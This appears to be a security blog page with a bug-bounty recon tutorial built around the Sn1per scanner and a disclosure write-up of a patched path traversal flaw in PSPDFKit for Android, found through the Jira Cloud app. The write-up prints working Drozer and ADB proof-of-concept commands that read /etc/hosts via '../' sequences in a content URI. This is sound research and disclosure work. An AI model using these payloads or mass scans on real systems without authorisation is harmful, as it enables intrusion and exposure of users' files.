Sn1per Professional v7.0 Demo

Aftermath2020 #002 with @xer0dayz – Live Bug Bounty Recon with Sn1per Professional

https://youtu.be/qYnfzIhTd10

Highlights:

0:00 – Basic stealth mode single domain recon with Sn1per Professional v8.0
5:00 – Leveraging built-in Sn1per Professional recon links to passively gather #OSINT
6:15 – Using InjectX fuzzer to fuzz dynamic URL’s (unreleased)
8:04 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories (unreleased)
9:00 – More stealth mode single target recon with split panel/search/host jump features
11:20 – Manual scan analysis of discovered URL’s
16:20 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories (unreleased)
17:35 – Use of Sn1per Professional’s host table filter
17:45 – Use of Sn1per Professional’s quick links to view websites in browser
18:52 – Use of Sn1per Professional’s built-in Google Dorks links to discover hidden content
19:20 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories (unreleased)
22:22 – Using Burpsuite Professional JSLinkFinder plugin to analyze Javascript files
24:20 – Leveraging built-in Sn1per Professional recon links to passively gather #OSINT
25:54 – Discovering hidden/cached content via URLScan.io
29:55 – Use of Sn1per Professional’s built-in Notepad add-on to keep notes on workspace
30:37 – Use of Fofa to conduct recon on target domain
35:31 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories with extensions (unreleased)
36:26 – Using Google dorks to discover content and URL’s
43:17 – Manual Javascript analysis from the command line
44:42 – Discovering pre-production and internal domains in Javascript files
53:18 – Digging deeper into hidden/discovered content on a target
57:14 – Discovering PayPal github repos in Javascript source
57:42 – Conducting basic github recon on PayPal developers for sensitive data

 

Bug Bounty Recon Like A Pro

Overview

In this blog post, I will cover the basic steps to performing bug bounty recon against large, open scoped programs and penetration tests.

If you’re like most starting out, this process can seem daunting and overwhelming depending on how many hosts you’re dealing with. Twitter for instance has 20,000+ subdomains and a HUGE attack surface to go through. How do you know where to focus your time? How do you keep track of which hosts you scanned and reviewed? These questions can quickly lead you spinning in circles, wasting valuable time while more experienced hunters get the gold. Luckily, there are tools and methodologies that can assist and make your life easier as a bug bounty hunter or penetration tester. This is where Sn1per comes in…

What is Sn1per?

Sn1per is an automated pentest reconnaissance scanner that can be used during penetration tests and bug bounties and to enumerate targets and scan for vulnerabilities. There are two versions of Sn1per available depending on your needs. Sn1per Community Edition (CE) is the open source scan engine that is maintained on Github (https://github.com/1N3/Sn1per). Sn1per Professional is XeroSecurity’s premium reporting add on for Sn1per and is available exclusively from the XeroSecurity website (https://xerosecurity.com).

Installation

Installation is extremely easy. Just clone the Github repo (git clone https://github.com/1N3/Sn1per) and run ./install.sh from a Kali Linux OS. This will install all tools and dependencies which are used to collect recon info and scan for vulnerabilities.

Scoping your target

So we have Sn1per installed and we’ve recited “The Rifleman’s Creed” a few times, the next phase is scoping our target. This is fairly obvious but we need to carefully review the bug bounty or pentest scope which gives us legal permission to test without getting thrown in prison. If you find yourself getting outside the intended scope, you’ve been warned – This “could” land you in jail!.
Now that the legal disclaimer is out of the way, what’s the first step?

Tactical Reconnaissance & OSINT

The first step in your reconnaissance process should be enumerating all subdomains and hosts within the target scope. For this, we’re interested in any wildcard domains (ie. *.target.com). In this case, it is up to the researcher to hunt for subdomains and hosts which fall within this target scope but haven’t been explicitly stated. For this, we will use sniper to actively and passively scan a target domain for subdomains via the -re switch and we’ll create a new workspace to store all our hosts via the -w switch. Additionally, we’ll also add the –osint switch to our scan to perform basic OSINT (Open Source Intelligence Gathering) searches on the target domain. This can reveal tons of useful information such as email addresses, public domains, documents, usernames, software used, whois info, reverse IP lookups, virtual hosts, etc. In addition, Sn1per will perform basic checks for subdomain hijacking and takeovers.
sniper -t target.com --recon --osint -w workspace_alias
This will store a complete list of all subdomains discovered and sorted at the following location:
/usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt

Calling In The Airstrike…

 

Now that we’ve enumerated all subdomains for the in-scope wildcard domain, we need to quickly enumerate all hosts with a high level flyover. This can be done by passing our host list from the previous step via the -f switch and running sniper in airstrike mode via the -m airstrike options. This will store all gathered data to our workspace and combine the data from all hosts scanned under /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/. Some basic info gathered from this mode include: DNS, open ports, HTTP headers, SSL ciphers, web fingerprints, TCP banners, WAF detection and basic file/directory and passive URL discovery.
sniper -f /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt -m airstrike -w workspace

Summary

After the Sn1per finishes scanning all hosts in our workspace, Sn1per Professional gives us some high level info via the console for each host as shown below. This will help us get a high level visual of the attack surface based on which ports are open, interesting HTTP headers, page titles and DNS records. It will become very clear that if the host has no DNS or open ports, there probably isn’t much of an attack surface to dig into further. It’s best to focus on interesting ports (ie. port 21 (FTP), port 22 (SSH), 3306 (MySQL), etc.) and web targets with interesting headers (ie. Server: Apache Tomcat v7.0.0) may be vulnerable and have known exploit code available.

Professional Reporting Interface

After our report gets generated, we can see Sn1per enumerated and scanned 1268 unique hosts automatically. As a penetration tester, you can now sift through all the information contained in your workspace to begin looking for interesting hosts and potential vulnerabilities. To help us manage all this data, we will leverage Sn1per Professional for the next steps in the process. Sn1per Professional offers the following features to help make our lives a bit easier.

Features:

– Professional reporting interface.
– Slideshow for all gathered screenshots.
– Searchable and sortable DNS, IP and open port database.
– Quick links to online recon tools and Google hacking queries.
– Personalized notes field for each host.

Demo Video:

Slideshow For All Gathered Screenshots

From here, we can perform visual recon via the “Slideshow” feature in Sn1per Pro. This can reveal all sorts of potentially interesting hosts which can help identify which hosts need to be scanned further for more information.

Searchable/Sortable DNS, IP and Open Port Database

To supplement our surface level reconnaissance, we can also utilize the “Port List” feature which provides a widget of all subdomains, open ports, DNS and page titles. All data stored within this widget can then be sorted and searched for based on your needs (ie. If you’re looking for port 22/tcp (SSH), search for “22”. If you want to find all virtual hosts in the environment based on the same page title, enter the full page title (ie. “Overstock Cars”), etc. The possibilities here are endless but we can quickly find interesting hosts and ports or DNS records using this feature in Sn1per Professional.

Conclusion

This concludes part one of this series. This is by no means a comprehensive recon tutorial, but it should be enough to get you started in the process. Stay tuned for more recon tips and tricks for getting the most out of your bug bounty and pentest recon with Sn1per.
@xer0dayz

 

Exploiting Path Traversal in PSPDFKit for Android (2.3.3 – 2.8.0)

 

Introduction

As part of my research into the Atlassian bug bounty program managed by BugCrowd (https://bugcrowd.com/atlassian), I recently discovered a directory traversal vulnerability in PSPDFKit for Android 2.3.3 – 2.8.0. After announcing my discovery on Twitter (https://twitter.com/crowdshield/status/889690387513724928), I received a few tweets asking for a tutorial and PoC of my discoveries and decided to create a blog post to document it. This particular vulnerability was discovered in the Atlassian Jira Cloud application and was verified to be fixed in the latest release.

Technical Background

The Jira Cloud Android application (com.atlassian.android.jira.core) is vulnerable to directory traversal via the following exported content provider: content://com.atlassian.android.jira.core.pdf.share/. This allows an attacker to view the local file system on the affected Android device from external 3rd party applications installed on the same device. To exploit this flaw, an attacker can create a malicious application which queries the content provider directly in order to retrieve specific files stored locally on the device. If the victim installs the malicious application, an attacker can read files stored locally on the device. Alternatively, the content provider can be queried directory via the Android debug bridge (ADB) and does not require “root” access.

Detection

To enumerate the Android application, I used reverse-apk (https://github.com/1N3/ReverseAPK) which is a tool I wrote to reverse APK files. This revealed an exported content provider named com.pspdfkit.document.sharing.DocumentSharingProvider which means 3rd party apps on the same device can query the provider directly.

# reverse-apk com.atlassian.android.jira.apk
... SNIP ...
Displaying Content Providers in AndroidManifest.xml...
=====================================================================
<provider android:authorities="com.atlassian.android.jira.core.pdf.share" android:exported="true"
android:grantUriPermissions="true" android:name="com.pspdfkit.document.sharing.DocumentSharingProvider"/>
... SNIP ...

Scanning

Next, I used Drozer to scan for common vulnerabilities such as SQL injection and directory traversal. This revealed a vulnerable content provider (content://com.atlassian.android.jira.core.pdf.share) but did not detail how to exploit the flaw.

# drozer console --server 127.0.0.1:31415 connect
drozer Console (v2.3.4)
dz> run scanner.provider.traversal -a com.atlassian.android.jira.core
Scanning com.atlassian.android.jira.core...
Not Vulnerable:
content://com.atlassian.android.jira.core.feedback.fileprovider
content://downloads/public_downloads
content://com.atlassian.android.jira.core/
content://com.atlassian.android.jira.core
content://com.atlassian.android.jira.core.pdf.assets
content://com.atlassian.android.jira.core.feedback.fileprovider/
content://downloads/public_downloads/
content://com.atlassian.android.jira.core.pdf.assets/
Vulnerable Providers:
content://com.atlassian.android.jira.core.pdf.share
content://com.atlassian.android.jira.core.pdf.share/
dz> run scanner.provider.traversal -a com.atlassian.android.jira.core
Scanning com.atlassian.android.jira.core...
Not Vulnerable:
content://com.atlassian.android.jira.core.feedback.fileprovider
content://downloads/public_downloads
content://com.atlassian.android.jira.core/
content://com.atlassian.android.jira.core
content://com.atlassian.android.jira.core.pdf.assets
content://com.atlassian.android.jira.core.feedback.fileprovider/
content://downloads/public_downloads/
content://com.atlassian.android.jira.core.pdf.assets/
Vulnerable Providers:
content://com.atlassian.android.jira.core.pdf.share
content://com.atlassian.android.jira.core.pdf.share/

Source Code Analysis

Drozer seemed to indicate that the content provider was vulnerable to directory traversal so I decided to take a look at the source code to confirm for myself. This was accomplished by running reverse-apk and opening the affected file. This confirmed that the content provider accepts URI strings via the ParcelFileDescriptor method and reads the contents (ParcelFileDescriptor.open(file, i);).

com.atlassian.android.jira.core.apk-jadx/com/pspdfkit/document/sharing/DocumentSharingProvider.java

public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
if (uri.getPath() == null) {
throw new FileNotFoundException(uri + " has empty path.");
} else if (getContext() == null) {
throw new IllegalStateException("Context was null.");
} else {
try {
int i;
File file = new File(getSharedFileDirectory(getContext()), uri.getPath());
if ("r".equals(mode)) {
i = 268435456;
} else if ("w".equals(mode) || "wt".equals(mode)) {
i = 738197504;
} else if ("wa".equals(mode)) {
i = 704643072;
} else if ("rw".equals(mode)) {
i = 939524096;
} else if ("rwt".equals(mode)) {
i = 1006632960;
} else {
i = 0;
}
return ParcelFileDescriptor.open(file, i);
} catch (IOException e) {
throw new FileNotFoundException(uri.toString() + " was not found.");
}
}
}

Exploitation

Now that I knew the content provider was vulnerable, I had to actually exploit this to do something useful. To do this, I used ADB (Android Debug Bridge) and Drozer (they essentially are the same thing and yield the same result..).

Drozer PoC

run app.provider.read content://com.atlassian.android.jira.core.pdf.share/.//..//.//..//.//..//.//..
//.//..//.//..//.//..//.//..///etc/hosts
127.0.0.1 localhost

ADB PoC

adb shell content query --uri content://com.atlassian.android.jira.core.pdf.share/.//..//.//..//.//..
//.//..//.//..//.//..//.//..//.//..///etc/hosts
127.0.0.1 localhost

Conclusion

After discovering the flaw, I reported the issue to Atlassian via BugCrowd and the issue was triaged by a BugCrowd analyst. Unfortunately, Atlassian later came back and reported that this issue was a duplicate and noted that this was a known issue affecting PSPDFKit for Android and has since been patched. As a consolation, I figured this would make a good blog post and Atlassian was nice enough to allow me to disclose the details publicly. The original advisory for PSPDFKit can be found below.

References

https://pspdfkit.com/guides/android/current/announcements/path-traversal-vulnerability/

Credit: [email protected]
Recent Comments